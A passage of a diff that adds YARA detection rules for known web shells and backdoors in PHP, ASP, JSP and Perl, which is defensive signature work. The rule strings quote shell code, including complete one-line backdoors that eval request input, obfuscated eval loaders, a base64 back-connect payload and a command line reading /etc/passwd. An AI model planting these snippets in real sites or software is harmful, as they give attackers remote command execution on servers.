+		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
+		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
+		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
+	condition:
+		1 of them
+}
+rule webshell_webshell_123 {
+	meta:
+		description = "Web shells - generated from file webshell-123.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "2782bb170acaed3829ea9a04f0ac7218"
+	strings:
+		$s0 = "// Web Shell!!" fullword
+		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
+		$s3 = "$default_charset = \"UTF-8\";" fullword
+		$s4 = "// url:http://www.weigongkai.com/shell/" fullword
+	condition:
+		2 of them
+}
+rule webshell_dev_core {
+	meta:
+		description = "Web shells - generated from file dev_core.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "55ad9309b006884f660c41e53150fc2e"
+	strings:
+		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
+		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
+		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
+		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_pHp {
+	meta:
+		description = "Web shells - generated from file pHp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b0e842bdf83396c3ef8c71ff94e64167"
+	strings:
+		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
+		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
+		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
+		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_pppp {
+	meta:
+		description = "Web shells - generated from file pppp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "cf01cb6e09ee594545693c5d327bdd50"
+	strings:
+		$s0 = "Mail: chinese@hackermail.com" fullword
+		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
+		$s6 = "Site: http://blog.weili.me" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_code {
+	meta:
+		description = "Web shells - generated from file code.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "a444014c134ff24c0be5a05c02b81a79"
+	strings:
+		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
+		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
+		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
+		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
+		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_jspyyy {
+	meta:
+		description = "Web shells - generated from file jspyyy.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
+	strings:
+		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_xxxx {
+	meta:
+		description = "Web shells - generated from file xxxx.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "5bcba70b2137375225d8eedcde2c0ebb"
+	strings:
+		$s0 = "<?php eval($_POST[1]);?>  " fullword
+	condition:
+		all of them
+}
+rule webshell_webshells_new_JJjsp3 {
+	meta:
+		description = "Web shells - generated from file JJjsp3.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "949ffee1e07a1269df7c69b9722d293e"
+	strings:
+		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_PHP1 {
+	meta:
+		description = "Web shells - generated from file PHP1.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
+	strings:
+		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_JJJsp2 {
+	meta:
+		description = "Web shells - generated from file JJJsp2.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "5a9fec45236768069c99f0bfd566d754"
+	strings:
+		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
+		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
+		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
+		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_radhat {
+	meta:
+		description = "Web shells - generated from file radhat.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "72cb5ef226834ed791144abaa0acdfd4"
+	strings:
+		$s1 = "sod=Array(\"D\",\"7\",\"S"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_asp1 {
+	meta:
+		description = "Web shells - generated from file asp1.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "b63e708cd58ae1ec85cf784060b69cad"
+	strings:
+		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_php6 {
+	meta:
+		description = "Web shells - generated from file php6.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "ea75280224a735f1e445d244acdfeb7b"
+	strings:
+		$s1 = "array_map(\"asx73ert\",(ar"
+		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+		$s4 = "shell.php?qid=zxexp  " fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_xxx {
+	meta:
+		description = "Web shells - generated from file xxx.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "0e71428fe68b39b70adb6aeedf260ca0"
+	strings:
+		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+	condition:
+		all of them
+}
+rule webshell_GetPostpHp {
+	meta:
+		description = "Web shells - generated from file GetPostpHp.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "20ede5b8182d952728d594e6f2bb5c76"
+	strings:
+		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+	condition:
+		all of them
+}
+rule webshell_webshells_new_php5 {
+	meta:
+		description = "Web shells - generated from file php5.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "cf2ab009cbd2576a806bfefb74906fdf"
+	strings:
+		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_PHP {
+	meta:
+		description = "Web shells - generated from file PHP.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
+	strings:
+		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
+		$s5 = " - ExpDoor.com</title>" fullword
+		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_Asp {
+	meta:
+		description = "Web shells - generated from file Asp.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "32c87744ea404d0ea0debd55915010b7"
+	strings:
+		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+		$s2 = "Function MorfiCoder(Code)" fullword
+		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+	condition:
+		1 of them
+}
+
+
+rule WebShell_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
+	strings:
+		$s0 = "WebShell.cgi"
+		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
+	condition:
+		all of them
+}
+rule WinX_Shell_html {
+	meta:
+		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+	strings:
+		$s0 = "WinX Shell"
+		$s1 = "Created by greenwood from n57"
+		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
+	condition:
+		2 of them
+}
+
+
+rule Dx_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Dx.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+	strings:
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
+	condition:
+		1 of them
+}
+rule csh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file csh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
+	strings:
+		$s0 = ".::[c0derz]::. web-shell"
+		$s1 = "http://c0derz.org.ua"
+		$s2 = "vint21h@c0derz.org.ua"
+		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
+	condition:
+		1 of them
+}
+rule pHpINJ_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d7a4b0df45d34888d5a09f745e85733f"
+	strings:
+		$s1 = "News Remote PHP Shell Injection" 
+		$s3 = "Php Shell <br />" fullword
+		$s4 = "<input type = \"text\" name = \"url\" value = \""
+	condition:
+		2 of them
+}
+rule sig_2008_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file 2008.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "3e4ba470d4c38765e4b16ed930facf2c"
+	strings:
+		$s0 = "Codz by angel(4ngel)"
+		$s1 = "Web: http://www.4ngel.net"
+		$s2 = "$admin['cookielife'] = 86400;"
+		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
+	condition:
+		1 of them
+}
+rule ak74shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7f83adcb4c1111653d30c6427a94f66f"
+	strings:
+		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
+		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
+		$s3 = "$xshell"
+	condition:
+		2 of them
+}
+rule Rem_View_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+	strings:
+		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 ="Welcome to phpRemoteView (RemView)"
+	condition:
+		1 of them
+}
+rule Java_Shell_js {
+	meta:
+		description = "Semi-Auto-generated  - file Java Shell.js.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+	strings:
+		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
+	condition:
+		2 of them
+}
+rule STNC_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file STNC.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
+	strings:
+		$s0 = "drmist.ru" fullword
+		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
+		$s2 = "STNC WebShell"
+		$s3 = "http://www.security-teams.net/index.php?showtopic="
+	condition:
+		1 of them
+}
+rule aZRaiLPhp_v1_0_php {
+	meta:
+		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "26b2d3943395682e36da06ed493a3715"
+	strings:
+		$s0 = "azrailphp"
+		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
+		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
+	condition:
+		2 of them
+}
+rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {
+	meta:
+		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
+	strings:
+		$s0 = ";$sd98=\"john.barker446@gmail.com\""
+		$s1 = "print \"Sending mail to $to....... \";"
+		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
+	condition:
+		1 of them
+}
+rule zacosmall_php {
+	meta:
+		description = "Semi-Auto-generated  - file zacosmall.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+	strings:
+		$s0 = "rand(1,99999);$sj98"
+		$s1 = "$dump_file.='`'.$rows2[0].'`"
+		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
+	condition:
+		2 of them
+}
+rule CmdAsp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "64f24f09ec6efaa904e2492dffc518b9"
+	strings:
+		$s0 = "CmdAsp.asp" 
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s2 = "-- Use a poor man's pipe ... a temp file --" 
+		$s3 = "maceo @ dogmile.com" 
+	condition:
+		2 of them
+}
+rule simple_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+	strings:
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" 
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+	condition:
+		2 of them
+}
+rule mysql_shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d42aec2891214cace99b3eb9f3e21a63"
+	strings:
+		$s0 = "SooMin Kim"
+		$s1 = "smkim@popeye.snu.ac.kr"
+		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
+	condition:
+		1 of them
+}
+rule Dive_Shell_1_0___Emperor_Hacking_Team_php {
+	meta:
+		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1b5102bdc41a7bc439eea8f0010310a5"
+	strings:
+		$s0 = "Emperor Hacking TEAM"
+		$s1 = "Simshell" fullword
+		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
+		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
+	condition:
+		2 of them
+}
+rule Asmodeus_v0_1_pl {
+	meta:
+		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0978b672db0657103c79505df69cb4bb"
+	strings:
+		$s0 = "[url=http://www.governmentsecurity.org"
+		$s1 = "perl asmodeus.pl client 6666 127.0.0.1" 
+		$s2 = "print \"Asmodeus Perl Remote Shell"
+		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+	condition:
+		2 of them
+}
+rule backup_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backup.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aeee3bae226ad57baf4be8745c3f6094"
+	strings:
+		$s0 = "#phpMyAdmin MySQL-Dump" fullword
+		$s2 = ";db_connect();header('Content-Type: application/octetstr"
+		$s4 = "$data .= \"#Database: $database" fullword
+	condition:
+		all of them
+}
+rule Reader_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Reader.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+	strings:
+		$s1 = "Mehdi & HolyDemon"
+		$s2 = "www.infilak."
+		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
+	condition:
+		2 of them
+}
+rule phpshell17_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpshell17.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
+	strings:
+		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
+		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+	condition:
+		1 of them
+}
+rule myshell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file myshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "62783d1db52d05b1b6ae2403a7044490"
+	strings:
+		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
+		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
+		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
+	condition:
+		2 of them
+}
+rule SimShell_1_0___Simorgh_Security_MGZ_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
+	strings:
+		$s0 = "Simorgh Security Magazine " 
+		$s1 = "Simshell.css"
+		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
+		$s3 = "www.simorgh-ev.com"
+	condition:
+		2 of them
+}
+rule jspshall_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
+	strings:
+		$s0 = "kj021320"
+		$s1 = "case 'T':systemTools(out);break;"
+		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
+	condition:
+		2 of them
+}
+rule webshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file webshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "e425241b928e992bde43dd65180a4894"
+	strings:
+		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
+		$s3 = "PHP Web Shell"
+	condition:
+		all of them
+}
+rule rootshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file rootshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "265f3319075536030e59ba2f9ef3eac6"
+	strings:
+		$s0 = "shells.dl.am"
+		$s1 = "This server has been infected by $owner"
+		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
+		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
+	condition:
+		2 of them
+}
+rule connectback2_pl {
+	meta:
+		description = "Semi-Auto-generated  - file connectback2.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "473b7d226ea6ebaacc24504bd740822e"
+	strings:
+		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
+		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
+		$s2 = "ConnectBack Backdoor"
+	condition:
+		1 of them
+}
+rule DefaceKeeper_0_2_php {
+	meta:
+		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "713c54c3da3031bc614a8a55dccd7e7f"
+	strings:
+		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
+		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
+	condition:
+		1 of them
+}
+rule shells_PHP_wso {
+	meta:
+		description = "Semi-Auto-generated  - file wso.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "33e2891c13b78328da9062fbfcf898b6"
+	strings:
+		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
+		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
+	condition:
+		1 of them
+}
+rule backdoor1_php {
+	meta:
+		description = "Semi-Auto-generated  - file backdoor1.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "e1adda1f866367f52de001257b4d6c98"
+	strings:
+		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
+		$s2 = "class backdoor {"
+		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
+	condition:
+		1 of them
+}
+rule elmaliseker_asp {
+	meta:
+		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+	strings:
+		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
+		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
+		$s2 = "dim zombie_array,special_array"
+		$s3 = "http://vnhacker.org"
+	condition:
+		1 of them
+}
+rule indexer_asp {
+	meta:
+		description = "Semi-Auto-generated  - file indexer.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+	strings:
+		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
+	condition:
+		1 of them
+}
+rule DxShell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "33a2b31810178f4c2e71fbdeb4899244"
+	strings:
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
+	condition:
+		1 of them
+}
+rule s72_Shell_v1_1_Coding_html {
+	meta:
+		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+	strings:
+		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
+		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
+		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\"" 
+	condition:
+		1 of them
+}
+rule hidshell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file hidshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c2f3327d60884561970c63ffa09439a4"
+	strings:
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+	condition:
+		all of them
+}
+rule kacak_asp {
+	meta:
+		description = "Semi-Auto-generated  - file kacak.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "907d95d46785db21331a0324972dda8c"
+	strings:
+		$s0 = "Kacak FSO 1.0"
+		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
+		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
+		$s4 = "mailto:BuqX@hotmail.com"
+	condition:
+		1 of them
+}
+rule PHP_Backdoor_Connect_pl_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "57fcd9560dac244aeaf95fd606621900"
+	strings:
+		$s0 = "LorD of IRAN HACKERS SABOTAGE"
+		$s1 = "LorD-C0d3r-NT" 
+		$s2 = "echo --==Userinfo==-- ;"
+	condition:
+		1 of them
+}
+rule Antichat_Socks5_Server_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
+	strings:
+		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+		$s3 = "#   [+] Domain name address type"
+		$s4 = "www.antichat.ru"
+	condition:
+		1 of them
+}
+rule Antichat_Shell_v1_3_php {
+	meta:
+		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "40d0abceba125868be7f3f990f031521"
+	strings:
+		$s0 = "Antichat"
+		$s1 = "Can't open file, permission denide"
+		$s2 = "$ra44"
+	condition:
+		2 of them
+}
+rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {
+	meta:
+		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+	strings:
+		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
+		$s1 = "Mode Shell v1.0</font></span>"
+		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
+	condition:
+		1 of them
+}
+rule mysql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "12bbdf6ef403720442a47a3cc730d034"
+	strings:
